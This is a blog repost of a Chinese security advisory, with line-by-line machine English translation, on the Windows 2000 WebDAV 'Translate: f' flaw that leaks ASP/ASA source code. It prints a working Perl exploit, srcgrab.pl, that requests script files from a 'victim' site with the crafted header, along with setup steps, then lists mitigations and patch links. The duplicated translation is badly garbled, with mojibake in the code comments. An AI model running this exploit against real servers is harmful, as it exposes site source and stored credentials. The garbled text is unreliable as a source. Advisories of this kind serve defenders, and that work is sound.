Pages

Sabtu, 12 November 2011

win2000的Translate:f问题泄露asp/asa文件 win2000 the Translate: f problem leak asp / asa file 安全焦点

安全焦点 Security Focus

参考资料: Translate:f summary, history and thoughts by ddoc@MIA.CZ Reference: Translate: f summary, history and thoughts by ddoc@MIA.CZ

一、漏洞信息 First, the vulnerability information

在win2000及office 2000(包括FrontPage 2000及FrontPage 2000 server extensions)里的WebDAV存在着一个安全问题Translate:f。 In win2000 and office 2000 (including FrontPage 2000 and FrontPage 2000 server extensions) in the WebDAV there is a security problem Translate: f.

当某人往目标机器的ASP/ASA(或者其它脚本文件)发送包含有"Translate:f"文件头的HTTP GET请求时, When a person is to the target machine's ASP / ASA (or other script) to send contains "Translate: f" header of the HTTP GET request,
windows2000(没有打过SP1补丁的——现在打补丁的还不是很多吧:)会返回该ASP/ASA的源代码而不是本该返回的经过处理的文件(还需要在url的结尾加上一个特殊字符"/")。 windows2000 (not played SP1 patch - the patch is not now a lot of it:) will return to the ASP / ASA source code instead of the return of the processed file (also requires the end of the url with a special character "/").

虽然这个漏洞出现于windows2000,但由于有些站点虽然仅使用IIS 4.0,但却安装了FrontPage Although this flaw appeared in windows2000, but some sites although only IIS 4.0, but installed the FrontPage
Server Server
Extensions 2000,所以这一影响可能会扩展到IIS 4.0的机器上。 Extensions 2000, so this effect may be extended to the IIS 4.0 machine.

二、利用方法 Second, the use of methods

smiler就此漏洞发表了一个用perl写成的利用程序: smiler this vulnerability published using a program written in perl:

-----------------------------start------------------------------------------------ ----------------------------- Start -------------------- ----------------------------
#!/usr/bin/perl #! / Usr / bin / perl
# Expl0it By smiler@vxd.org # Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works # Tested with sucess against IIS 5.0. Maybe it works
against IIS 4.0 using a shared drive but I haven磘tested against IIS 4.0 using a shared drive but I haven Yao tested
it yet. it yet.
# Get the source code of any script from the server # Get the source code of any script from the server
using this exploit. using this exploit.
# This code was written after Daniel Docekal brought # This code was written after Daniel Docekal brought
this issue in BugTraq. this issue in BugTraq.
# Cheers 351 and FractalG :) # Cheers 351 and FractalG:)

if (not $ARGV[0]) { if (not $ ARGV [0]) {
print qq~ print qq ~
Geee it磗running !! kewl :))) Geee it Breakers running!! Kewl:)))
Usage : srcgrab.pl Usage: srcgrab.pl
Example Usage : srcgrab.pl Example Usage: srcgrab.pl
http://www.victimsite.com/global.asa http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl U can also save the retrieved file using: srcgrab.pl
http://www.victim.com/default.asp > file_to_save http://www.victim.com/default.asp> file_to_save
~; exit;} ~; Exit;}


$victimurl=$ARGV[0]; $ Victimurl = $ ARGV [0];

# Create a user agent object # Create a user agent object
use LWP::UserAgent; use LWP:: UserAgent;
$ua = new LWP::UserAgent; $ Ua = new LWP:: UserAgent;

# Create a request # Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # my $ req = new HTTP:: Request GET => $ victimurl. '\ \'; #
Here is the backslash at the end of the url ;) Here is the backslash at the end of the url;)
$req->content_type('application/x-www-form-urlencoded'); $ Req-> content_type ('application / x-www-form-urlencoded');
$req->content_type('text/html'); $ Req-> content_type ('text / html');
$req->header(Translate => 'f'); # Here is the famous $ Req-> header (Translate => 'f'); # Here is the famous
translate header :)) translate header:))
$req->content('match=www&errors=0'); $ Req-> content ('match = www & errors = 0');

# Pass request to the user agent and get a response back # Pass request to the user agent and get a response back
my $res = $ua->request($req); my $ res = $ ua-> request ($ req);

# Check the outcome of the response # Check the outcome of the response
if ($res->is_success) { if ($ res-> is_success) {
print $res->content; print $ res-> content;
} else { } Else {
print $res->error_as_HTML; print $ res-> error_as_HTML;
} }
---------------------------------end--------------------------------------- --------------------------------- End ---------------- -----------------------

要使用这一程序,你可能需要下载几个perl的模块(可以到 To use this procedure, you may need to download some perl modules (can go to
http://www.perl.org上去search:) http://www.perl.org up the search:)

1、libwww-perl-5.48.tar.gz 1, libwww-perl-5.48.tar.gz
2、URI-1.09.tar.gz 2, URI-1.09.tar.gz
3、HTML-Parser-3.11.tar.gz 3, HTML-Parser-3.11.tar.gz

每个包只有几十K大吧,下载解包后进入目录,运行 Each package only a few dozen large K it, download unpack into the directory, run

#perl Makefile.PL&&make&&make install # Perl Makefile.PL & & make & & make install

就可以了。 On it. have fun :) have fun:)

(昨天出了洋相,在url后面加了个?,可以访问到部份asp,自以为得手,洋洋自得,大加吹嘘,后来朋友指出,返回的是处理过的代码,而不是源码,猛然醒悟,大为狼狈,特加此注,自己来点警告) (Yesterday, out of the spectacle, in the back added a url?, You can have access to part of the asp, think they succeeded, complacent, boasting a large increase, then a friend pointed out, the return code is treated, rather than the source, a rude awakening , greatly embarrassed, Ortega this note, to point his warning)

三、解决方案: Third, the solution:

1、nsfocus的adam提出了临时解决方案如下: 1, nsfocus of adam made a temporary solution as follows:

中文版: Chinese version:
iisreset /stop iisreset / stop
c: c:
cd \WINNT\system32\inetsrv cd \ WINNT \ system32 \ inetsrv
cacls httpext.dll /d everyone cacls httpext.dll / d everyone
Are you sure (Y/N)?y Are you sure (Y / N)? Y
iisreset /start iisreset / start

2、正式方案 2, the official program

下载并安装补丁: Download and install the patch:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769或 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769 or

http://download.microsoft.com/download/win2000platform/Patch/Q256888/NT5/EN-US/Q256888_W2K_SP1_x86_en.EXE http://download.microsoft.com/download/win2000platform/Patch/Q256888/NT5/EN-US/Q256888_W2K_SP1_x86_en.EXE

也可以通过安装Windows 2000 Service Pack 1来解决这个问题: You can also install Windows 2000 Service Pack 1 to solve this problem:

http://www.microsoft.com/windows2000/downloads/recommended/sp1/http://202.101.106.13/ http://www.microsoft.com/windows2000/downloads/recommended/sp1/http://202.101.106.13/

Tidak ada komentar:

Posting Komentar